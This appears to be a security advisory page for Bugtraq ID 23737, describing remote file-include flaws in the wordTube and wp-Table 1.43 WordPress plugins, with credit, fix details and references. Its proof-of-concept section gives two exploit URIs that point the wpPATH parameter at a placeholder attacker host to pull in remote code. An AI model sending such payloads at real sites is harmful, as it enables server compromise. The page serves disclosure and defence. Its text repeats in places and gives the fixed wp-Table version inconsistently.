WordPress Plugins Multiple Remote File Include Vulnerabilities
BID:23737
Info
WordPress Plugins Multiple Remote File Include Vulnerabilities
| Bugtraq ID: | 23737 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-2482 CVE-2007-2481 |
| Remote: | Yes |
| Local: | No |
| Published: | May 01 2007 12:00AM |
| Updated: | Jul 06 2016 02:39PM |
| Credit: | M.Hasran Addahroni is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
Ruben Boelinger wp-Table plugin for Wordpress 1.43 Ruben Boelinger wordTube plugin for Wordpress 1.43 |
| Not Vulnerable: | |
Discussion
WordPress Plugins Multiple Remote File Include Vulnerabilities
The WordPress wordTube and wp-Table plugins are prone to multiple remote file-include vulnerabilities because they fail to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
wpTable 1.43 and wordTube 1.43 are vulnerable; other versions may also be affected.
The WordPress wordTube and wp-Table plugins are prone to multiple remote file-include vulnerabilities because they fail to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
wpTable 1.43 and wordTube 1.43 are vulnerable; other versions may also be affected.
Exploit / POC
WordPress Plugins Multiple Remote File Include Vulnerabilities
Attackers can use a browser to exploit these issues.
The following proof-of-concept URIs are available:
http://www.example.com/wp-content/plugins/wp-table/js/wptable-button.phpp?wpPATH=http://www.example2.com/evil?
http://www.example.com/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.example2.com/evil?
Attackers can use a browser to exploit these issues.
The following proof-of-concept URIs are available:
http://www.example.com/wp-content/plugins/wp-table/js/wptable-button.phpp?wpPATH=http://www.example2.com/evil?
http://www.example.com/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.example2.com/evil?
Solution / Fix
WordPress Plugins Multiple Remote File Include Vulnerabilities
Solution:
The vendor has released wordTube 1.44 and wp-Table 1.41 to address these issues. Please see the references for details.
Ruben Boelinger wordTube plugin for Wordpress 1.43
Ruben Boelinger wp-Table plugin for Wordpress 1.43
Solution:
The vendor has released wordTube 1.44 and wp-Table 1.41 to address these issues. Please see the references for details.
Ruben Boelinger wordTube plugin for Wordpress 1.43
-
Ruben Boelinger Wordpress wordTube Plugin version 1.44
http://alexrabe.boelinger.com/?dl=wordtube.zip
Ruben Boelinger wp-Table plugin for Wordpress 1.43
-
Ruben Boelinger wp-Table for WordPress version 1.44
http://alexrabe.boelinger.com/?dl=wp-table.zip
References
WordPress Plugins Multiple Remote File Include Vulnerabilities
References:
References:
- Wordpress wordTube plugin Web Site (Ruben Boelinger)
- Wordpress wp-Table plugin Web Site (Ruben Boelinger)
- [ECHO_ADV_81$2007] wordpress plugins wordTube <= 1.43 (wpPATH) Remote File Inclu (M.Hasran Addahroni)
- [ECHO_ADV_82$2007] wordpress plugins wp-Table <= 1.43 (wpPATH) Remote File Inclu (M.Hasran Addahroni)